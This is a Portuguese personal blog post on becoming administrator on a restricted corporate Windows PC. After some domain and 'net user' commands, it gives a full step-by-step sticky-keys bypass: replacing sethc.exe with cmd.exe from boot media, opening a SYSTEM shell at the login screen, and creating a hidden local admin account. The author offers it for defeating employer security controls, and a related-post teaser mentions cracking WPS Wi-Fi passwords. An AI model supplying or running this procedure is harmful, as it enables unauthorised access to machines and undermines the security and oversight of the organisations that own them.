Michel Metran

Michel Metran

A equação me propõe,
…computador me resolve!

Tornando-se Administrador

4 minuto(s) de leitura

Usualmente os computadores de empresas e instituições (PC de “firma”) apresentam diversas restrições de acesso aos usuários/funcionários, visando aumentar a segurança. Os motivos são diversos, porém tanta segurança dificulta, e muito, o que as empresas/instituições mais desejam de seus funcionários: produtividade!

Visando ser mais produtivo e, portanto, destravar os PCs, passei um tempo estudando e cheguei a uma solução. Tradicionalmente esses PCs tem sistema operacional Windows!, e os usuários tem perfis de “usuários”, ao invés de “administradores”, ou seja, nada podem fazer no PC!, nenhuma configuração! Nada.


Active Directory

O Windows pode gerenciar os usuários, quando institucional, a partir do Active Directory. Para saber se o usuário está em uma rede corporativa, basta checar isso, existem várias alternativas:


Alternativa 1

Talvez a forma mais fácil seja essa

# Checar se o PC está em um domínio (no CMD)
wmic computersystem get domain


Alternativa 2

Outra forma comentada pelo portal Windows-Commandline, é utilizando o systeminfo. Mais detalhes podem ser vistos aqui

# Checar se o PC está em um domínio (no CMD)
systeminfo | findstr /B "Domain"
echo %userdomain%


Alternativa 3

Talvez a forma mais simples seja essa, indicada pela Universidade de Illinois aqui Active Directory, How to tell if your computer is joined to an Active Directory

# Checar se o PC está em um domínio (no CMD)
set user


Net User

Usando o Windows 10, no CMD, rodando como administrador, é possível listar os usuários da máquina com o comando net user.

# Listando Usuários
C:\Windows\system32>net user

# Listando Usuários em Domínio
C:\Windows\system32>net user /domain

# Output
A solicitação será processada em um controlador de domínio para o domínio [domain].
Erro de sistema 1355.
O domínio especificado não existe ou não pôde ser contatado.

# Infos de Usuário
net user [username]
net user administrator

# Ativando Usuário
net user administrator /active: yes

# Desativando Usuário
net user administrator /active: no

# Adicionar Usuário sem senha, no PC...
net user [username] * /add
net user josesilva * /add
net user "maria bezerra" * /add  # Se tiver espaço no nome, usar aspas duplas

# Deletando Usuário
net user [username] /del

# Avaliar Usuário Listado
net user [username]

# Vê quais os grupos existentes
net localgroup

# Me adiciona ao grupo
net localgroup Administradores josesilva /add


Hack

Por meio das informações apresentadas no vídeo YouTube: Hacker Tip - Acquiring Administrative Access to Windows! vi que é possível me adicionar a um perfil de administrador ao Sistema Operacional.

  • Passo 1: “Bootar” o Windows com um disco de inicialização do Windows. Na tela que se escolha o idioma, apertar Shift F10.
  • Passo 2: No prompt de comando, encontrar onde está instalado o Windows, usando um dir. Tive problemas ao tentar cd C: e, no prompt, usei só C: e deu certo!


Observação: A ideia principal é chegar ao prompt antes de logar!, de forma que acessemos o prompt com o perfil de nt authority\system (isso é possível checar com o comando whoami). Fiz usando o sethc.exe, porém é possível fazer com o magnify.exe ou utilman.exe.

# Encontra a pasta
cd D:
cd windows/system32

# Criando um backup da "Tecla de Aderência"
copy sethc.exe sethc_old.exe

# Copiando o terminal para a "Tecla de Aderência"
copy cmd.exe sethc.exe

# Sair
exit


  • Passo 3: Reboota o PC, normalmente, e na tecla de inicialização, clica 5 vezes no Shift, que é a tecla de aderência (aplicativo sethc.exe)
  • Passo 4: No prompt de comando é possível ver algumas coisas
# Descobrir quem sou eu
whoami

# Ver Usuários Listados
net user> [domain]\[username]


  • Passo 5: Ainda no prompt de comando é possível adicionar usuários
# Adicionar Usuário sem senha, no PC...
net user josesilva * /add    @teste123


  • Passo 6: Feito isso é possível adiciona-lo no grupo local dos Administradores:
# Vê quais os grupos existentes
net localgroup

# Adiciona usuários ao grupo Administradores
net localgroup Administradores josesilva /add


  • Passo 7: Sair do prompt e ir para a tela inicial. Entro no meu usuário, que tem direitos de usuário apenas.

  • Passo 8: Agora é possível usar o comando abaixo para adicionar o usuário ao PC local, como o perfil de administrador! Pedirá senha e usuário de administrador: use a que criou “josesilva” !!!!

# Gerenciamento do Computador
compmgmt.msc


  • Passo 9: Convém deletar usuário.
# Deletando Usuário
net user josesilva /del


  • Passo 10: Caso não tenha deltado o usuário, é possível sair do prompt e ir para a tela inicial. Uma vez adicionado os usuários, já é possível logar fora do domínio institucional.
# Acessar Usuário Local
.\josesilva


  • Passo 11:
# Encontra a pasta
cd D:
cd windows/system32

# Copiando...
copy sethc_old.exe sethc.exe

# Sair
exit


Para adicionar usuários como administradores

executar > "control userpasswords2"


Referências


TODO

  • Estudar por que meu usuário, gerido por um Active Directory, não aparece usando o comando NetUser

Tags:

Categorias: ,

Atualizado em:

Deixe um comentário

Talvez você também goste

PowerBI: Cidades Antirracistas

menos que 1 minuto(s) de leitura

O formato padrão do PowerBI é esse abaixo, que não renderiza bem em celular. <iframe title="Projeto Cidades Antirracistas" width="600" height="373....

PowerToys

menos que 1 minuto(s) de leitura

PowerToys é um conjunto de utilitários para usuários avançados personalizarem o Windows e aumentar a produtividade. Ele inclui uma variedade de ferramentas, ...

Encontrar senha wi-fi que usam WPS

1 minuto(s) de leitura

Seguindo o vídeo Hack wifi with wps crack using reaver in kali linux 2018.1 vi a possibilidade de descobrir senhas wi-fi de roteadores que usam WPS, sem que ...